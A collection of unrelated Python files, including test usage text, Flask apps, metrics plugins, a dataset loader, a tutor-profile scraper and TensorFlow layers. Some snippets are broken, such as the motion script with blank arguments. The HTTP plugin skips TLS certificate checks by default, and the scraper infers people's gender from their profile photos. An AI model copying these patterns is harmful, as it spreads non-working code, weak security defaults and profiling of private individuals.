print "*** BE SURE TO RUN BELOW COMMAND FIRST:"
print
print "export PYTHONPATH=$PYTHONPATH:/home/vagrant/se34euca"
print
print "export DISPLAY=:0"
print
print "## TEST RUN ##"
print
print "./runtest_ip_address.py -i 192.168.51.86 -p 8888 -a ui-test-acct-00 -u user00 -w mypassword1 -t allocate_two_ip_addresses"
print
print "./runtest_ip_address.py -i 192.168.51.86 -p 8888 -a ui-test-acct-00 -u user00 -w mypassword1 -t release_ip_address"
print
if __name__ == "__main__":
main()
exit
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from iss import download
from iss.util import cleanup
from nose.tools import with_setup
def setup_function():
output_file_prefix = 'data/.test'
def teardown_function():
cleanup(['data/test_download.fasta'])
@with_setup(setup_function, teardown_function)
def download_to_fasta():
ftp_url = 'ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCF/000/737/615/GCF_000737615.1_ASM73761v1/GCF_000737615.1_ASM73761v1_genomic.fna.gz'
download.assembly_to_fasta(ftp_url, 'data/test_download.fasta')
@with_setup(setup_function, teardown_function)
def test_ncbi():
genome_list = download.ncbi('bacteria', 2, 'data/test_download.fasta')
|
#!/usr/bin/env python3
import csv
import os
import subprocess
import sys
from argparse import ArgumentParser
def main():
p = ArgumentParser()
p.add_argument("metadata")
args = p.parse_args()
cohort_id = None
with open(args.metadata, "r") as f:
reader = csv.reader(f, delimiter="\t")
for row in reader:
if row[0] == "Cohort ID":
cohort_id = row[1].strip().lower()
if not cohort_id:
print("ERROR: No 'Cohort ID' found in metadata")
sys.exit(1)
# New files to add
template = f"templates/{cohort_id}.tsv"
if not os.path.exists(template):
print(f"ERROR: '{template}' does not exists - run update task and try again")
sys.exit(1)
owl = f"data_dictionaries/{cohort_id}.owl"
if not os.path.exists(owl):
print(f"ERROR: '{owl}' does not exists - run update task and try again")
sys.exit(1)
metadata = f"metadata/{cohort_id}.ttl"
if not os.path.exists(metadata):
print(f"ERROR: '{metadata}' does not exists - run update task and try again")
sys.exit(1)
for file in [
template,
owl,
metadata,
"data/cohort-data.json",
"data/metadata.json",
"src/prefixes.json",
]:
print(f"Adding {file}...")
subprocess.call(["git", "add", file], cwd=".")
if __name__ == "__main__":
main()
|
from factory import Faker, post_generation
from factory.django import DjangoModelFactory
from cookbook.recipes.models import Ingredient, Recipe
class RecipeFactory(DjangoModelFactory):
recipe_name = "pizza"
class Meta:
model = Recipe |
from SimpleCV import Camera, Display, Image, np, VideoStream
import time
#Program by Fares Al Ghazy, 15/8/2016
#A thanks to the FaceBook group " Raspberry pi" which was very helpful
#A special thanks to Martin Jenkins for giving alot of his time, knowledge and support
#This code is not supposed to be used commercially
#Do not use program before checking with local laws
#This program is not meant to run instantly, try to understand it then use it :)
#initialize camera
cam = Camera()
#threshold between 0 and 1
def detectmotion(threshold,noise_constant):
#take 2 images
img1 = cam.getImage()
#wait before taking next image, some time diff ==> greater difference ==> better detection
time.sleep()
img2 = cam.getImage()
#find difference between images
difference = img2 - img1
#since this uses integer division, pixels close to 0 will become 0, this depends on camera quality
difference = difference/noise_constant
#convert difference to matrix
matrix = difference.getNumpy()
#flatten matrix
flat = matrix.flatten()
#nonzero pixels are ones that have gone through motion (for more info on this, look into image arithmetics)
num_pixels_changed = np.count_nonzero(flat)
percent_change = float(num_pixels_changed) / float(len(flat))
if percent_change >= threshold:
return True
else:
return False
#initialize videostream
#choose video format
format = ""
#create file name
name = "" + time.strftime("%d_%m")+ time.strftime("%H_%M") +format
#determine file path
path = ""+name
vs = VideoStream(path, fps = )
while True:
print("Program started,waiting for motion")
motion = detectmotion()
if motion:
print("Motion detected, capturing video")
start_time = time.time()
mins = 0
#determine video length and take video
while(mins <= ):
image=cam.getImage()
image.save(vs)
mins = (time.time() - start_time) / 60
print("Video captured and saved")
time.sleep()
|
"""
Base Plugin Classes
"""
import csv
import logging
from os import path
import requests
import socket
import tempfile
import time
import urllib.parse as urlparse
LOGGER = logging.getLogger(__name__)
class Plugin(object):
GUID = 'com.meetme.newrelic_plugin_agent'
MAX_VAL = 2147483647
def __init__(self, config, poll_interval, last_interval_values=None):
self.config = config
LOGGER.debug('%s config: %r', self.__class__.__name__, self.config)
self.poll_interval = poll_interval
self.poll_start_time = 0
self.derive_values = dict()
self.derive_last_interval = last_interval_values or dict()
self.gauge_values = dict()
def add_datapoints(self, data):
"""Extend this method to process the data points retrieved during the
poll process.
:param mixed data: The data received during the poll process
"""
raise NotImplementedError
def add_derive_value(self, metric_name, units, value, count=None):
"""Add a value that will derive the current value from the difference
between the last interval value and the current value.
If this is the first time a stat is being added, it will report a 0
value until the next poll interval and it is able to calculate the
derivative value.
:param str metric_name: The name of the metric
:param str units: The unit type
:param int value: The value to add
:param int count: The number of items the timing is for
"""
if value is None:
value = 0
metric = self.metric_name(metric_name, units)
if metric not in self.derive_last_interval.keys():
LOGGER.debug('Bypassing initial %s value for first run', metric)
self.derive_values[metric] = self.metric_payload(0, count=0)
else:
cval = value - self.derive_last_interval[metric]
self.derive_values[metric] = self.metric_payload(cval, count=count)
LOGGER.debug('%s: Last: %r, Current: %r, Reporting: %r',
metric, self.derive_last_interval[metric], value,
self.derive_values[metric])
self.derive_last_interval[metric] = value
def add_derive_timing_value(self, metric_name, units, count, total_value,
last_value=None):
"""For timing based metrics that have a count of objects for the timing
and an optional last value.
:param str metric_name: The name of the metric
:param str units: The unit type
:param int count: The number of items the timing is for
:param int total_value: The timing value
:param int last_value: The last value
"""
if last_value is None:
return self.add_derive_value(metric_name, units,
total_value, count)
self.add_derive_value('%s/Total' % metric_name,
units, total_value, count)
self.add_derive_value('%s/Last' % metric_name,
units, last_value, count)
def add_gauge_value(self, metric_name, units, value,
min_val=None, max_val=None, count=None,
sum_of_squares=None):
"""Add a value that is not a rolling counter but rather an absolute
gauge
:param str metric_name: The name of the metric
:param str units: The unit type
:param int value: The value to add
:param float value: The sum of squares for the values
"""
metric = self.metric_name(metric_name, units)
self.gauge_values[metric] = self.metric_payload(value,
min_val,
max_val,
count,
sum_of_squares)
LOGGER.debug('%s: %r', metric_name, self.gauge_values[metric])
def component_data(self):
"""Create the component section of the NewRelic Platform data payload
message.
:rtype: dict
"""
metrics = dict()
metrics.update(self.derive_values.items())
metrics.update(self.gauge_values.items())
return {'name': self.name,
'guid': self.GUID,
'duration': self.poll_interval,
'metrics': metrics}
def error_message(self):
"""Output an error message when stats collection fails"""
LOGGER.error('Error collecting stats data from %s. Please check '
'configuration and sure it conforms with YAML '
'syntax', self.__class__.__name__)
def finish(self):
"""Note the end of the stat collection run and let the user know of any
errors.
"""
if not self.derive_values and not self.gauge_values:
self.error_message()
else:
LOGGER.info('%s poll successful, completed in %.2f seconds',
self.__class__.__name__,
time.time() - self.poll_start_time)
def initialize(self):
"""Empty stats collection dictionaries for the polling interval"""
self.poll_start_time = time.time()
self.derive_values = dict()
self.gauge_values = dict()
def initialize_counters(self, keys):
"""Create a new set of counters for the given key list
:param list keys: Keys to initialize in the counters
:rtype: tuple
"""
count, total, min_val, max_val, values = (dict(), dict(), dict(),
dict(), dict())
for key in keys:
(count[key], total[key], min_val[key],
max_val[key], values[key]) = 0, 0, self.MAX_VAL, 0, list()
return count, total, min_val, max_val, values
def metric_name(self, metric, units):
"""Return the metric name in the format for the NewRelic platform
:param str metric: The name of th metric
:param str units: The unit name
"""
if not units:
return 'Component/%s' % metric
return 'Component/%s[%s]' % (metric, units)
def metric_payload(self, value, min_value=None, max_value=None, count=None,
squares=None):
"""Return the metric in the standard payload format for the NewRelic
agent.
:rtype: dict
"""
if not value:
value = 0
if isinstance(value, str):
value = 0
sum_of_squares = int(squares or (value * value))
if sum_of_squares > self.MAX_VAL:
sum_of_squares = 0
return {'min': min_value,
'max': max_value,
'total': value,
'count': count or 1,
'sum_of_squares': sum_of_squares}
@property
def name(self):
"""Return the name of the component
:rtype: str
"""
return self.config.get('name', socket.gethostname().split('.')[0])
def poll(self):
"""Poll the server returning the results in the expected component
format.
"""
raise NotImplementedError
def sum_of_squares(self, values):
"""Return the sum_of_squares for the given values
:param list values: The values list
:rtype: float
"""
value_sum = sum(values)
if not value_sum:
return 0
squares = list()
for value in values:
squares.append(value * value)
return sum(squares) - float(value_sum * value_sum) / len(values)
def values(self):
"""Return the poll results
:rtype: dict
"""
return self.component_data()
class SocketStatsPlugin(Plugin):
"""Connect to a socket and collect stats data"""
DEFAULT_HOST = 'localhost'
DEFAULT_PORT = 0
SOCKET_RECV_MAX = 10485760
def connect(self):
"""Top level interface to create a socket and connect it to the
socket.
:rtype: socket
"""
try:
connection = self.socket_connect()
except socket.error as error:
LOGGER.error('Error connecting to %s: %s',
self.__class__.__name__, error)
else:
return connection
def fetch_data(self, connection, read_till_empty=False):
"""Read the data from the socket
:param socket connection: The connection
"""
LOGGER.debug('Fetching data')
received = connection.recv(self.SOCKET_RECV_MAX)
while read_till_empty:
chunk = connection.recv(self.SOCKET_RECV_MAX)
if chunk:
received += chunk
else:
break
return received
def poll(self):
"""This method is called after every sleep interval. If the intention
is to use an IOLoop instead of sleep interval based daemon, override
the run method.
"""
LOGGER.info('Polling %s', self.__class__.__name__)
self.initialize()
# Fetch the data from the remote socket
connection = self.connect()
if not connection:
LOGGER.error('%s could not connect, skipping poll interval',
self.__class__.__name__)
return
data = self.fetch_data(connection)
connection.close()
if data:
self.add_datapoints(data)
self.finish()
else:
self.error_message()
def socket_connect(self):
"""Low level interface to create a socket and connect to it.
:rtype: socket
"""
if 'path' in self.config:
if path.exists(self.config['path']):
LOGGER.debug('Connecting to UNIX domain socket: %s',
self.config['path'])
connection = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
connection.connect(self.config['path'])
else:
LOGGER.error('UNIX domain socket path does not exist: %s',
self.config['path'])
return None
else:
remote_host = (self.config.get('host', self.DEFAULT_HOST),
self.config.get('port', self.DEFAULT_PORT))
LOGGER.debug('Connecting to %r', remote_host)
connection = socket.socket()
connection.connect(remote_host)
return connection
class HTTPStatsPlugin(Plugin):
"""Extend the Plugin class overriding poll for targets that provide data
via HTTP protocol.
"""
DEFAULT_PATH = '/'
DEFAULT_QUERY = None
def fetch_data(self):
"""Fetch the data from the stats URL
:rtype: str
"""
data = self.http_get()
return data.text if data else ''
def http_get(self, url=None):
"""Fetch the data from the stats URL or a specified one.
:param str url: URL to fetch instead of the stats URL
:rtype: requests.models.Response
"""
LOGGER.debug('Polling %s Stats at %s',
self.__class__.__name__, url or self.stats_url)
req_kwargs = self.request_kwargs
req_kwargs.update({'url': url} if url else {})
try:
response = requests.get(**req_kwargs)
except requests.ConnectionError as error:
LOGGER.error('Error polling stats: %s', error)
return ''
if response.status_code >= 300:
LOGGER.error('Error response from %s (%s): %s', self.stats_url,
response.status_code, response.content)
return None
return response
def poll(self):
"""Poll HTTP server for stats data"""
self.initialize()
data = self.fetch_data()
if data:
self.add_datapoints(data)
self.finish()
@property
def stats_url(self):
"""Return the configured URL in a uniform way for all HTTP based data
sources.
:rtype: str
"""
netloc = self.config.get('host', 'localhost')
if self.config.get('port'):
netloc += ':%s' % self.config['port']
return urlparse.urlunparse((self.config.get('scheme', 'http'),
netloc,
self.config.get('path', self.DEFAULT_PATH),
None,
self.config.get('query',
self.DEFAULT_QUERY),
None))
@property
def request_kwargs(self):
"""Return kwargs for a HTTP request.
:rtype: dict
"""
kwargs = {'url': self.stats_url}
if self.config.get('scheme') == 'https':
kwargs['verify'] = self.config.get('verify_ssl_cert', False)
if 'username' in self.config and 'password' in self.config:
kwargs['auth'] = (self.config['username'], self.config['password'])
LOGGER.debug('Request kwargs: %r', kwargs)
return kwargs
class CSVStatsPlugin(HTTPStatsPlugin):
"""Extend the Plugin overriding poll for targets that provide JSON output
for stats collection
"""
def fetch_data(self):
"""Fetch the data from the stats URL
:rtype: dict
"""
data = super(CSVStatsPlugin, self).fetch_data()
if not data:
return dict()
temp = tempfile.TemporaryFile()
temp.write(data)
temp.seek(0)
reader = csv.DictReader(temp)
data = list()
for row in reader:
data.append(row)
temp.close()
return data
def poll(self):
"""Poll HTTP JSON endpoint for stats data"""
self.initialize()
data = self.fetch_data()
if data:
self.add_datapoints(data)
self.finish()
class JSONStatsPlugin(HTTPStatsPlugin):
"""Extend the Plugin overriding poll for targets that provide JSON output
for stats collection
"""
def fetch_data(self):
"""Fetch the data from the stats URL
:rtype: dict
"""
data = self.http_get()
try:
return data.json() if data else {}
except Exception as error:
LOGGER.error('JSON decoding error: %r', error)
return {}
def poll(self):
"""Poll HTTP JSON endpoint for stats data"""
self.initialize()
data = self.fetch_data()
if data:
self.add_datapoints(data)
self.finish()
|
import csv
from flask import render_template, request, send_file
from flask_classy import FlaskView, route
from flask_login import login_required
from OrderSystem import db, sentry
from OrderSystem.routing.ErrorHandler import get_current_user
from OrderSystem.sql.ORM import Order
from OrderSystem.utilities.ServerLogger import log_event
class SystemService(FlaskView):
"""
This route will handle doing miscellaneous tasks that involve interacting with the backend.
I.e. :
- Generating a data dump
"""
# Routes will be prefixed by sys-service
route_base = ""
@route('/', methods=['GET'])
@login_required
def index(self):
return render_template('sys-service/index.html')
@route('/data-exporter', methods=['GET', 'POST'])
@login_required
def data_exporter(self):
if request.method == 'POST':
fiscal_year = request.form.get('fiscal_year')
csv_path = '/tmp/{0}-fiscal-year-orders.csv'.format(fiscal_year)
with open(csv_path, 'wb') as csv_file:
writer = csv.writer(csv_file, delimiter=',', quoting=csv.QUOTE_ALL)
writer.writerow(
"part_name,part_quantity,part_url,part_unit_price,part_total_price,vendor_name,ordering_subteam,"
"part_ordered_on".split(',')
)
all_orders_in_fiscal_year = db.session.query(Order).filter(Order.fiscal_year == fiscal_year).order_by(
Order.part_ordered_on.asc())
for order in all_orders_in_fiscal_year:
part_name = order.part_name
part_quantity = order.part_quantity
part_url = order.part_url
part_unit_price = order.part_unit_price
part_total_price = order.part_total_price
vendor_name = order.vendor.vendor_name
ordering_subteam_name = order.subteam.name
part_ordered_on = order.part_ordered_on
writer.writerow([part_name, part_quantity, part_url, part_unit_price, part_total_price, vendor_name,
ordering_subteam_name, part_ordered_on])
try:
return send_file(csv_path, as_attachment=True)
except Exception as e:
log_event('ERROR', '{0} encountered {1} at {2}'.format(get_current_user(), e, request.path))
sentry.captureException()
else:
return render_template('sys-service/data-exporter.html', page="data_exporter")
|
import string
def rotate(orig, offset):
ret = ""
for c in orig:
if c in string.ascii_lowercase:
ret += chr(ord('a') + (ord(c) - ord('a') + offset) % 26)
elif c in string.ascii_uppercase:
ret += chr(ord('A') + (ord(c) - ord('A') + offset) % 26)
else:
ret += c
return ret
|
"""Stack loss data"""
__all__ = ['COPYRIGHT','TITLE','SOURCE','DESCRSHORT','DESCRLONG','NOTE', 'load']
__docformat__ = 'restructuredtext'
COPYRIGHT = """This is public domain. """
TITLE = __doc__
SOURCE = """
Brownlee, K. A. (1965), "Statistical Theory and Methodology in
Science and Engineering", 2nd edition, New York:Wiley.
"""
DESCRSHORT = """Stack loss plant data of Brownlee (1965)"""
DESCRLONG = """The stack loss plant data of Brownlee (1965) contains
21 days of measurements from a plant's oxidation of ammonia to nitric acid.
The nitric oxide pollutants are captured in an absorption tower."""
NOTE = """
Number of Observations - 21
Number of Variables - 4
Variable name definitions::
STACKLOSS - 10 times the percentage of ammonia going into the plant that
escapes from the absoroption column
AIRFLOW - Rate of operation of the plant
WATERTEMP - Cooling water temperature in the absorption tower
ACIDCONC - Acid concentration of circulating acid minus 50 times 10.
"""
from numpy import recfromtxt, column_stack, array
from scikits.statsmodels.datasets import Dataset
from os.path import dirname, abspath
def load():
"""
Load the stack loss data and returns a Dataset class instance.
Returns
--------
Dataset instance:
See DATASET_PROPOSAL.txt for more information.
"""
filepath = dirname(abspath(__file__))
data = recfromtxt(open(filepath + '/stackloss.csv',"rb"), delimiter=",",
names=True, dtype=float)
names = list(data.dtype.names)
endog = array(data[names[0]], dtype=float)
endog_name = names[0]
exog = column_stack(data[i] for i in names[1:]).astype(float)
exog_name = names[1:]
dataset = Dataset(data=data, names=names, endog=endog, exog=exog,
endog_name = endog_name, exog_name=exog_name)
return dataset
|
import pandas as pd
from processing.utils import infer_gender_image, infer_gender_name, download_images, consolidate_gender, clean_name
import os
import re
from bs4 import BeautifulSoup
import datetime
from pathlib import Path
import json
from constants import DATA_PATH
def visit_language(list_path: str,
html_path: str,
language: str,
file_regex: str = "([0-9]+)\_([0-9]+)"):
files = set([file for file in os.listdir(html_path + language) if ~file.startswith('.')])
teachers = []
# Read teachers lists
list_files = set([file for file in os.listdir(list_path + language) if ~file.startswith('.')])
lists = {}
for l in list_files:
lists[l.replace('.json', '')] = pd.read_json(os.path.join(list_path + language, l))
for file in files:
match = re.match(file_regex, file)
pos = match.group(1)
date = match.group(2)
soup = generate_soup(os.path.join(html_path + language, file), pos, language, lists[date])
if soup:
info = crawl_teacher(pos, date, language, lists[date], soup)
teachers.append(info)
df = pd.DataFrame(teachers)
return df
def generate_soup(file_path: str,
position: int,
language: str,
prior_info: dict):
soup = BeautifulSoup(open(file_path), "html.parser")
return soup
def crawl_teacher(position: int,
date: int,
language: str,
prior_info: dict,
soup):
info = {}
info["language"] = language
info["position"] = position
info["retrieval_date"] = date
info['is_featured'] = prior_info[prior_info['position'] == int(position)]['is_featured'].values[0]
script = str([s for s in soup.find_all('script') if str(s).endswith('var isMobile = false;</script>')][0])
json_details = json.loads(re.findall("var apolloState = (.*)", script)[0][:-1])
teacher_key = [key for key in list(json_details.keys()) if key.startswith('Teacher')][0]
user_key = [key for key in list(json_details.keys()) if key.startswith('User')][0]
teacher_info = json_details[teacher_key]
try:
info["first_name"] = json_details[user_key]['first_name']
except:
info['first_name'] = 'ERROR'
try:
info["last_name"] = json_details[user_key]['last_name']
except:
info['last_name'] = 'ERROR'
try:
info["url"] = soup.findAll('link', {'rel': 'alternate'})[0].get('href')
except:
info['url'] = 'ERROR'
try:
if 'nationality' in teacher_info.keys():
info['nationality'] = teacher_info['nationality']
else:
info['nationality'] = teacher_info['country']
except:
info['nationality'] = 'ERROR'
try:
info['location'] = json_details[user_key]['timezone']
except:
info['location'] = 'ERROR'
try:
info['avg_rating'] = teacher_info['avg_rating']
except:
info['avg_rating'] = 'ERROR'
try:
info['avg_lessons_per_students'] = teacher_info['avg_lessons_per_students']
except:
info['avg_lessons_per_students'] = 'ERROR'
try:
info['num_ratings'] = teacher_info['num_ratings']
except:
info['num_ratings'] = 'ERROR'
try:
info['teaching_levels'] = teacher_info['teaches_levels']['json']
except:
info['teaching_levels'] = 'ERROR'
try:
info['teaches'] = language
except:
info['teaches'] = 'ERROR'
try:
skill_keys = [key for key in list(json_details.keys()) if 'Skill' in key]
class_details = []
for key in skill_keys:
class_details.append({'category': json_details[key]['category'], 'name': json_details[key]['name']})
info['class_details'] = class_details
except:
info['class_details'] = "ERROR"
try:
langs = soup.findAll('span', {'class': 'ProfLanguage'})
speaks = {}
for s in langs:
lang_code = re.findall("<span language=\"([\w]+)\"", str(s))[0]
lang = re.findall("<span language=\"\w+\">([\w]+)<", str(s))[0]
level = re.findall("<div class=.*>([\w]+)", str(s))[0]
speaks[lang] = {'code': lang_code, 'level': level}
info['speaks'] = speaks
except:
info['speaks'] = 'ERROR'
try:
info['lessons'] = json_details[teacher_info['user']['id']]['num_past_tutor_sessions_teacher']
except:
info['lessons'] = 'ERROR'
try:
info['students'] = json_details[teacher_key]['num_students']
except:
info['students'] = 'ERROR'
try:
price_keys = [key for key in list(json_details.keys()) if 'prices' in key][:-1]
prices = []
for key in price_keys:
num_lessons = json_details[key]['num_lessons']
prices.append({'num_lessons': num_lessons, 'price': float(json_details[key]['price_cents'])/100})
info['price_detail'] = prices
info['price'] = prices[0]['price']/prices[0]['num_lessons']
except:
info['price'] = 'ERROR'
try:
dialect_key = [key for key in list(json_details.keys()) if 'AccentDialect' in key]
if len(dialect_key):
info['dialect'] = json_details[dialect_key]['id']['name']
else:
info['dialect'] = 'Undefined'
except:
info['dialect'] = 'ERROR'
info['price_currency'] = 'USD'
try:
info['avatar_url'] = json_details[user_key]['profile_pic_url']
except:
info['avatar_url'] = 'ERROR'
return info
def main():
list_path = os.path.join(DATA_PATH, "verbling/teachers_list/")
html_path = os.path.join(DATA_PATH, "verbling/teachers_html/")
output_path = os.path.join(DATA_PATH, "verbling/results/")
languages = set([lang for lang in os.listdir(list_path) if ~lang.startswith('.')])
for language in languages:
df = visit_language(list_path, html_path, language)
df.to_csv(output_path+language+"/{}.csv".format(datetime.datetime.today().strftime('%Y%m%d')))
def infer_gender(df, column_name, prob_bound, img_url_col, images_path):
df = infer_gender_name(df, column_name)
df_not_ready = df[df['gender_name_prob'] <= prob_bound]
images = list(df_not_ready[img_url_col].unique())
download_images(images, images_path, delete_folder=True)
img_gender = infer_gender_image(images_path)
img_gender = img_gender.rename(columns={'image': 'avatar_url'})
img_gender = img_gender.set_index('avatar_url')
#Transform df for join
df['avatar_url'] = df['avatar_url'].str.replace('https://res.cloudinary.com/verbling/image/fetch/c_fill,f_png,f_auto,g_face,h_150,w_150/', '')
result = df.join(img_gender, on='avatar_url', how='left')
return result
if __name__ == "__main__":
main() |
import sys
from collections import defaultdict
sys.setrecursionlimit(10 ** 6)
stdin = sys.stdin
INF = float('inf')
MOD = 10 ** 9 + 7
ni = lambda: int(ns())
na = lambda: list(map(int, stdin.readline().split()))
ns = lambda: stdin.readline().strip()
def modpow(a, b, m):
res = 1
while b != 0:
if b % 2 == 1:
res = res * a % m
a = a * a % m
b >>= 1
return res
N, K = na()
if K == 1:
if N == 1:
print(1)
else:
print(0)
elif N == 1:
print(K % MOD)
elif N == 2:
print(K * (K - 1) % MOD)
else:
print((K * (K - 1) * modpow(K - 2, N - 2, MOD)) % MOD) |
from flask import Blueprint, render_template, request, redirect
from . import db
bp = Blueprint("todos", __name__)
@bp.route("/", methods=('GET', 'POST'))
def index():
"""View for home page which shows list of to-do items."""
cur = db.get_db().cursor()
if request.method == 'POST':
filter = request.form['filter']
if filter == 'all':
cur.execute('SELECT * FROM todos')
todos = cur.fetchall()
cur.close()
return render_template("index.html", todos=todos)
elif filter == 'completed':
cur.execute('SELECT * FROM todos WHERE completed=True')
todos = cur.fetchall()
cur.close()
return render_template("index.html", todos=todos)
elif filter == 'uncompleted':
cur.execute('SELECT * FROM todos WHERE completed=False')
todos = cur.fetchall()
cur.close()
return render_template("index.html", todos=todos)
cur.execute('SELECT * FROM todos')
todos = cur.fetchall()
cur.close()
return render_template("index.html", todos=todos)
@bp.route("/add", methods=["POST"])
def new_task():
task = request.form['task']
with db.get_db() as con:
with con.cursor() as cur:
cur.execute("""INSERT INTO todos (description, completed, created_at)
VALUES (%s, %s, NOW())""",
(task, False))
return redirect("/")
@bp.route("/remove", methods=["POST"])
def remove():
with db.get_db() as con:
with con.cursor() as cur:
if request.method == 'POST':
remove = request.form.get("remove")
for task in request.form:
cur.execute("DELETE FROM todos WHERE id = %s",
(remove,))
con.commit()
@bp.route("/complete/<int:id>")
def complete(id):
with db.get_db() as con:
with con.cursor() as cur:
cur.execute("UPDATE todos SET completed = True WHERE id = %s", (id,))
con.commit()
@bp.route('/edit', methods=['GET', 'POST'])
def edit():
if request.method == 'POST':
with db.get_db() as con:
with con.cursor() as cur:
editTask = request.form.get('editTask')
id = request.form.get('edit')
cur.execute(" UPDATE todos SET description = %s WHERE id = %s", (editTask, id,))
con.commit()
return redirect("/")
|
import os
from typing import Tuple
import mlflow
import mlflow.sklearn
import numpy as np
from skl2onnx import convert_sklearn
from skl2onnx.common.data_types import FloatTensorType
from sklearn.datasets import load_iris
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import OneClassSVM
def get_data() -> Tuple[np.ndarray]:
iris = load_iris()
data = iris.data
data = np.array(data).astype("float32")
return data
def define_ocs_pipeline() -> Pipeline:
steps = [("normalize", StandardScaler()), ("ocs", OneClassSVM(nu=0.1, gamma="auto"))]
pipeline = Pipeline(steps=steps)
return pipeline
def train(model, data):
model.fit(data)
def evaluate(model, data) -> float:
size = len(data)
predict = model.predict(data)
return sum(predict) / size
def save_onnx(model, filepath: str):
initial_type = [("float_input", FloatTensorType([None, 4]))]
onx = convert_sklearn(model, initial_types=initial_type)
with open(filepath, "wb") as f:
f.write(onx.SerializeToString())
def main():
mlflow_experiment_id = int(os.getenv("MLFLOW_EXPERIMENT_ID", 0))
data = get_data()
model = define_ocs_pipeline()
train(model, data)
outlier_rate = evaluate(model, data)
mlflow.log_param("normalize", "StandardScaler")
mlflow.log_param("model", "one_class_svm")
mlflow.log_metric("outlier_rate", outlier_rate)
mlflow.sklearn.log_model(model, "model")
onnx_name = f"iris_ocs_{mlflow_experiment_id}.onnx"
onnx_path = os.path.join("/tmp/", onnx_name)
save_onnx(model, onnx_path)
mlflow.log_artifact(onnx_path)
if __name__ == "__main__":
main()
|
import pandas as pd
import datetime
from datetime import datetime
from datetime import date
import petaldata
from petaldata.datasets.stripe.reports.abstract_stripe_report import AbstractStripeReport
from petaldata.datasets.stripe.reports.mtd_revenue import MTDRevenue
from petaldata.datasets.stripe.reports import query_filters
class Summary(AbstractStripeReport):
def __init__(self,invoices,tz='UTC',end_time=datetime.now().astimezone()):
super().__init__(invoices,tz=tz,end_time=end_time)
self.mtd_report = MTDRevenue(invoices,tz=tz,end_time=end_time,fullRange=False)
def to_frame(self):
pass
def to_gsheet(self,creds,spreadsheet_title=None,worksheet_title="Summary"):
print("Opening Google Sheet...title=",spreadsheet_title)
# Must share sheet with "client_email" from JSON creds
sh = self.gsheet_client(creds).open(spreadsheet_title)
wks = self.find_or_create_wks(sh,worksheet_title)
df_mtd = self.mtd_report.to_frame()
print("\t...updating worksheet")
# rev
wks.cell('I6').value = df_mtd.amount_due_per_month.max()
wks.cell('I7').value = df_mtd["amount_due_per_month (Previous Month)"].max()
wks.cell('J6').value = df_mtd.amount_paid_per_month.max()
wks.cell('J7').value = df_mtd["amount_paid_per_month (Previous Month)"].max()
# customers
wks.cell('I11').value = df_mtd.customers.max()
wks.cell('I12').value = df_mtd["customers (Previous Month)"].max()
# logging updated at
wks.cell('I3').value = str(self.setup_time(datetime.now().astimezone(),tz=self.tz))
print("\t...Done.")
|
# -*- coding: utf-8 -*-
"""
Defines mneflow.layers for mneflow.models.
@author: Ivan Zubarev, ivan.zubarev@aalto.fi
"""
#TODO: keras compatible layers
#TODO: pooling layer
#import functools
import tensorflow as tf
from tensorflow.keras.initializers import Constant
from tensorflow.keras.activations import relu
from tensorflow.keras import constraints as k_con, regularizers as k_reg
# import tensorflow.compat.v1 as tf
# tf.disable_v2_behavior()
import numpy as np
class BaseLayer(tf.keras.layers.Layer):
def __init__(self, size, nonlin, specs, **args):
super(BaseLayer, self).__init__(**args)
self.size = size
self.nonlin = nonlin
self.specs = specs
self.specs.setdefault("l1", 0.)
self.specs.setdefault("l2", 0.)
self.specs.setdefault("l1_scope", [])
self.specs.setdefault("l2_scope", [])
self.specs.setdefault("maxnorm_scope", [])
def _set_regularizer(self):
if self.scope in self.specs['l1_scope'] or 'weights' in self.specs['l1_scope']:
reg = k_reg.l1(self.specs['l1'])
print('Setting reg for {}, to l1'.format(self.scope))
elif self.scope in self.specs['l2_scope'] or 'weights' in self.specs['l2_scope']:
reg = k_reg.l2(self.specs['l2'])
print('Setting reg for {}, to l2'.format(self.scope))
else:
reg = None
return reg
def _set_constraints(self):
if self.scope in self.specs['maxnorm_scope']:
constr = k_con.MaxNorm(2.)
print('Setting constraint for {}, to MaxNorm'.format(self.scope))
else:
constr = None
return constr
class Dense(BaseLayer, tf.keras.layers.Layer):
"""
Fully-connected layer
"""
def __init__(self, scope="fc", size=None, nonlin=tf.identity, specs={},
**args):
self.scope = scope
super(Dense, self).__init__(size=size, nonlin=nonlin, specs=specs,
**args)
self.constraint = self._set_constraints()
self.reg = self._set_regularizer()
def get_config(self):
config = self.get_config()
config.update({'scope': self.scope, 'size': self.size,
'nonlin': self.nonlin})
return config
def build(self, input_shape):
super(Dense, self).build(input_shape)
# print(input_shape)
self.flatsize = np.prod(input_shape[1:])
#print(self.scope, ':::', )
self.w = self.add_weight(shape=[self.flatsize, self.size],
initializer='he_uniform',
regularizer=self.reg,
constraint=self.constraint,
trainable=True,
name='fc_weights',
dtype=tf.float32)
self.b = self.add_weight(shape=[self.size],
initializer=Constant(0.1),
regularizer=None,
trainable=True,
name='fc_bias',
dtype=tf.float32)
print("Built: {} input: {}".format(self.scope, input_shape))
def call(self, x, training=None):
"""Dense layer currying, to apply layer to any input tensor `x`"""
while True:
with tf.name_scope(self.scope):
if len(x.shape) > 2: # flatten if input is not 2d array
x = tf.reshape(x, [-1, self.flatsize])
tmp = tf.matmul(x, self.w) + self.b
tmp = self.nonlin(tmp, name='out')
#print(self.scope, ": output :", tmp.shape)
return tmp
class DeMixing(BaseLayer):
"""
Spatial demixing Layer
"""
def __init__(self, scope="dmx", size=None, nonlin=tf.identity, axis=-1,
specs={}, **args):
self.scope = scope
self.axis = axis
super(DeMixing, self).__init__(size=size, nonlin=nonlin, specs=specs,
**args)
def get_config(self):
config = super(DeMixing, self).get_config()
config.update({'scope': self.scope, 'size': self.size,
'nonlin': self.nonlin, 'axis': self.axis})
return config
def build(self, input_shape):
super(DeMixing, self).build(input_shape)
self.constraint = self._set_constraints()
self.reg = self._set_regularizer()
self.w = self.add_weight(
shape=(input_shape[self.axis], self.size),
initializer='he_uniform',
regularizer=self.reg,
constraint = self.constraint,
trainable=True,
name='dmx_weights',
dtype=tf.float32)
self.b_in = self.add_weight(shape=([self.size]),
initializer=Constant(0.1),
regularizer=None,
trainable=True,
name='bias',
dtype=tf.float32)
print("Built: {} input: {}".format(self.scope, input_shape))
#@tf.function
